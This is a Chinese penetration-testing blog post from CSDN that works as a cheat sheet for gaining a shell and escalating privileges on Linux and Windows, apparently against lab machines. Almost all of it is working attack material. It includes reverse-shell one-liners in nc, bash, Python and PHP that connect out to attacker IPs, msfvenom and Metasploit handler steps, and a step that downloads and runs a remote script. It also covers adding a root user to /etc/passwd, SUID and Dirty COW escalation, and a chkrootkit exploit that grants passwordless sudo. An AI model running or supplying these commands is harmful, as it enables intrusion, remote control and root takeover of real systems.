获权和提权

最新推荐文章于 2024-03-07 18:22:42 发布
置顶 最新推荐文章于 2024-03-07 18:22:42 发布
阅读量515 收藏 1
点赞数 1
分类专栏: 渗透测试 文章标签: 渗透测试基础
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44495657/article/details/103364521
版权

获权和提权(1

在输入框中执行以下代码

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1|nc 192.168.232.131 443 >/tmp/f #kali地址和端口

echo "bash -i >&/dev/tcp/192.168.164.128/443 0>&1" | bash   #在系统命令中执行反弹shell

在kali中监听

nc -nvlp 443

shell反弹成功
将shell转换成交互式 (执行不成功加sudo)

python -c 'import pty; pty.spawn("/bin/bash")#提权代码,返回执行用户的shell

获得自己加密密码

perl -le 'print crypt("pass","aa")'
echo '用户名:密码:0:0:用户名:/root:/bin/bash'>>/etc/passwd#已经存在的用户名,让它有管理员权限

切换用户,提权成功
下面这个是查找可以修改的文件

var/www/node/Bulldog-2-The-Reckoning$ find / -perm -o=w -type f 2>/dev/null | grep -v /proc/>dev/null | grep -v /proc/>

如果、/etc/passwd可以修改边可以加入用户到管理权限

suid提权

找一个属于root的有s权限的文件

find / -perm -u=s -type f 2>/dev/null
touch abc
find abc -exec whoami \;

使用msfvenom获权

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.94.128 LPORT=443 -f raw > shell.php	#生成反弹shell的php代码
curl -H 'Expect:' -T 'shell.php' http://192.168.94.131/test/789.php  #上传到目标机
			启用msfconsole模块
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter_reverse_tcp
设置目标机和端口----run-----shell
提权exploit -j  
sessions #看回话

获权和提权(2

能执行系统命令

在kali中的www/html 中写入shell.py

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.211.143",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.219.146",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

用python打开服务

python -m SimpleHTTPServer 80
nc -nvlp 1234#监听shell脚本中端口

在目标机中上传shell,并执行

pwd&&wget http://ip/shell.py#下载脚本
python shell.py#执行脚本

反弹shell成功
/etc/issue 查看内核

提权3

sudo su root#输入当前用户密码就行

提权4(脏牛提权)

Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复
下载dirtycow-master
tmp下

gcc -pthread dirty.c -o 22 -lcrypt 
./22
uname -a  #看系统
cat /etc/issue  #看内核

提权5(searchsploit 的使用)

searchsploit 版本
查找版本漏洞
执行提权

获权php脚本 6

<?php $sock=fsockopen("192.168.219.129",4444);exec("/bin/sh -i <&3 >&3 2>&3");?>   #kali写入  被目标下载
<?php system("wget 192.168.219.129/shell.txt -O /tmp/shell.php; php /tmp/shell.php");?>   #目标下载 被包含执行

找密码

linux下

/etc/passwd	  用户权限
/etc/shadow   密码文件

linux中找密码路径

php反弹shell的文件路径

/usr/share/webshells/php#ls
webshells下有asp  aspx  cfm  jsp  perl  php 语言的shell
php-reverse-shell.php  反弹shell脚本

chkrootkit的漏洞提权

0.49版本在/tmp/update 定时用root执行文件里的内容

find / -name chkrootkit    #查看目录
cd /usr/sbin/      #进入这目录下
chkrootkit -V      #查看版本

第一种

写入update.c的执行文件 代码如下

#include<unistd.h>
void main(void)
{
system("chown root:root /tmp/update");
system("chmod 4755 /tmp/update");
setuid(0);
setgid(0);
execl("/bin/sh","sh",NULL);
}

编译执行

ls -al 文件 #查看文件权限
gcc update.c -o update
./update      #如果权限不够 sudo chmod -R 777 update

第二种

执行增加可写的命令到sudoers(执行sudo命令的用户管理文件中),追加www-data 用户使用sudo不用输入密码。等待执行

echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers' > /tmp/update
ls -l   				#查看权限
chmod 777 update   		#改权限
sudo su root			#切换root用户

windows获取shell

msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.3.128 LPORT=4445 -f exe -o /tmp/win.exe

use auxiliary/server/ftp 
set FTPROOT /tmp
back(放入后台)
handler -p windows/meterpreter_reverse_tcp -H 192.168.3.1 -P 4445

echo open 10.0.3.120>ttt.txt&echo anonymous>>ttt.txt&echo whatever>>ttt.txt&echo binary>>ttt.txt&echo get win.exe>>ttt.txt&echo bye>>ttt.txt&ftp -s:ttt.txt
TSDaq
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python反弹shell_Linux下NC反弹shell命令(推荐)
weixin_32223631的博客
02-20 690
本机开启监听:nc -lvnp 4444nc -vvlp 4444目标机器开启反弹bash版本:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1perl版本:perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))...
linux反弹shell方法
weixin_53747497的博客
07-12 2006
被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i : 打开一个交互式的bash shell/dev/tcp/IP/PORT : /dev/tcp/是Linux中的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。0>&1 : 将输入重定向到标准输出,为了确保命令执行后的输入被正确的传回攻击机。
黑客零基础第一章--反向shell
ShadowBlade
08-09 4904
一篇文章叫你完全掌握反向shell
渗透测试常用反弹shell方法(如何渗透测试反弹shell?)-Linux篇(゚益゚メ) 渗透测试
寻觅的博客
04-19 2383
文章目录相关博客反弹shell介绍Linux基础重定向标准文件操作符空文件联合使用常用反弹方式NetCat(NC)反弹正向NC反向NC 相关博客 Linux信息收集、渗透测试常用命令: https://xunmi.blog.csdn.net/article/details/114970239 Linux常用提权方法: https://xunmi.blog.csdn.net/article/details/115187418 渗透测试常用反弹shell方法(如何渗透测试反弹shell?: https://x
反弹shell总结
weixin_44576725的博客
04-26 4525
反弹shell 在介绍反弹链接的时候先说明什么是正向链接:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。而反弹shell是指攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。本质上是网络概念的客户端与服务端的角色反转。反弹shell简单来说就是通过命令让靶机的shell的控制权交到攻击者的机器中。 可能有人会问:我们都能够在靶机
NC渗透测试
Letter_
05-10 1577
参考: http://www.freebuf.com/articles/system/10632.html http://www.waitalone.cn/linux-shell-rebound-under-way.html https://docs.python.org/2/py-modindex.html 大家在做渗透测试的时候,遇到linux的服务器,想反弹shell
无需解锁直接获权 Xperia系列Root教程
11-25
无需解锁直接获权 Xperia系列Root教程
(Innodisk)小型化USB产品获专利权
11-19
USB产品的专利主要诉求为:标准USB 连接头内部设置电子零件,可使USB 周边产品设计极小化。 由宜鼎公司于2004起年陆续取得各国专利,其中尤以美国专利因市场庞大且主要国际OEM 大厂所在而引起高度关注,以最近一年来...
动态获权Glide缓存.zip
09-25
本文将详细解析"动态获权Glide缓存.zip"中涉及的关键知识点,包括动态权限请求、Glide图片加载以及缓存机制。 1. **动态权限请求**: 在Android 6.0(API级别23)及以上版本,系统引入了运行时权限模型。开发者...
5.北京喜获奥运会举办权.pdf
08-11
5.北京喜获奥运会举办权.pdf
靶机渗透之Bulldog2(六)
Delity的博客
08-17 330
一、环境准备 一台kali,一台FourAndSix2,能相互ping通 二、靶机发现 1.主机发现,用kali扫描靶机ip地址为192.168.115. nmap -sP 192.168.115.0/24
Linux Netcat 命令——网络工具中的瑞士军刀
Leo Zhang
04-11 2539
netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它。使用netcat命令所能完成的事情令人惊讶。 netcat所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了。你能建立一个服务器,传输文件,与朋友聊天,传输流媒体或者用它作为其它协议的独立客户端。 下面是一些使用netcat的
反弹shell的几种方法
stonesharp的专栏
04-13 4245
bash版本: ? 1 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1   ,注意某些linux不支持   perl版本:   ? 1 2 3 4 5 pe
SickOs1.2靶场练习&小白详解&计划任务提权&chkrootkit提权
最新发布
jockerboss的博客
03-07 1051
SickOs1.2靶场渗透详解&小白入门&计划任务提权&chkrootkit提权
内网渗透(二)之提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-14 5535
对于内网渗透,到我们拿到了公网主机的权限后,并获得了一些本机的信息时。我们首先得知道我们的权限。如果获取到的是普通用户权限,则我们需要想办法提权至管理员权限。如果获得的已经是管理员权限,则可以忽略这一步。对于Windows系统,只有提权到管理员权限后,才可以运行mimikatz以及执行一些其他高权限的操作。对于Linux系统,很多命令需要root权限才能执行,只有提权到root权限才能执行后面的信息收集等工作。
【Hack The Box】linux练习-- Nineveh
人间体佐菲的博客
11-09 823
【Hack The Box】linux练习-- Nineveh
文件的读写基本操作
热门推荐
范高伦的博客
09-07 1万+
一、文件是计算机中数据持久化存储的表现形式 读写文件标准操作格式1: 1、打开文件:file1 = open('文件名','读写模式') 2、操作文件 3、关闭文件:file1.close() 文件操作完毕后必须关闭,否则长期保持对文件的连接状态,造成内存溢出的现象发生 读写文件操作格式2: # 1、打开文件 file1 = open('demo.txt','w') # 2、操作文件 file1.write('hello world') # 3、关闭文件 file1.close() 1、打开文件:wi
Vulnhub-DC-7
T1me
11-02 123
入门系列第五弹DC-7 基本信息 下载地址:DC-7 靶机:vmware,192.168.172.139 攻击机:kali2 Flag:1个 渗透过程 0x01 nmap扫描 扫描一下,只有22和80开放。 0x02 信息泄漏 访问页面。 发现欢迎界面一直在暗示我们outside,那么盒子外面应该指的就是不让我们爆破而是本身就存在一些信息已经给予我们了。左下角给了一个名字DC7USER,最后在推特找到了这个账户。 给了我们个github的账户。。。害还不如百度一下。进去发现是一部分源码。 肯定是要先看co
采用 requests 和 beautifulsoup4 函数库获
05-11
1. 导入 requests 和 BeautifulSoup 函数库 ``` python import requests from bs4 import BeautifulSoup ``` 2. 发送 GET 请求获取网页数据 ``` python url = "https://www.example.com" response = requests.get...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值